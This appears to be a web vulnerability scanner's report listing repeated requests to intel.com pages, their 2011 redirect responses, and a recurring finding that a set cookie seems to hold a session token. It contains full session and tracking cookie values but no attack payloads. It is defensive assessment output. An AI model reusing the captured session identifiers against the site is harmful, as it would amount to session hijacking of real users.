HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/consumer/products/processors/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:54 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=IICLKMPAPACPLDCOBKFLHJBN; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /design/index.htm?iid=gg_work+home_developer HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business/design?iid=gg_work+home_developer Content-Length: 26 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:35 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=GNBLKMPAFHLKMADCLBGOHLPO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /design/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business/design Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:35 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=IHLMGNPAHFBCNAJEAKIGGMFL; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /experience/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/consumer/tomorrow/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:21:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:07 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=EBAGCODABFBKKPBGEKIPELIE; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /experience/index.htm?iid=hdr+experience HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/consumer/tomorrow/index.htm?iid=hdr+experience Content-Length: 18 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:21:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:07 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=OLOMGNPAOJJPLJEKIDHHLFML; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /in/business/index.htm?iid=gg_en_IN+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_en_IN+noscript Content-Length: 21 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:18:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:20 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=PJALKMPAJKLKFPKDNMFCNIFM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /in/business/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:18:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:18:20 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=NMLFCODANKHMMOONLMFOKPDB; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/cr/gcr/overview.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/report/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:11 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=DFOFCODADDMPDKOJANLDPAHC; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/cr/gcr/overview.htm?iid=subhdr+cr_report HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/report/index.htm?iid=subhdr+cr_report Content-Length: 20 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:11 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=ONMMGNPAFKDBEPPANKEAFOJD; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/education/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/about/corporateresponsibility/education/index.htm Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:11 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=COMMGNPAMKDEGPBAGCECNLKO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intel/education/index.htm?iid=subhdr+cr_edu HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 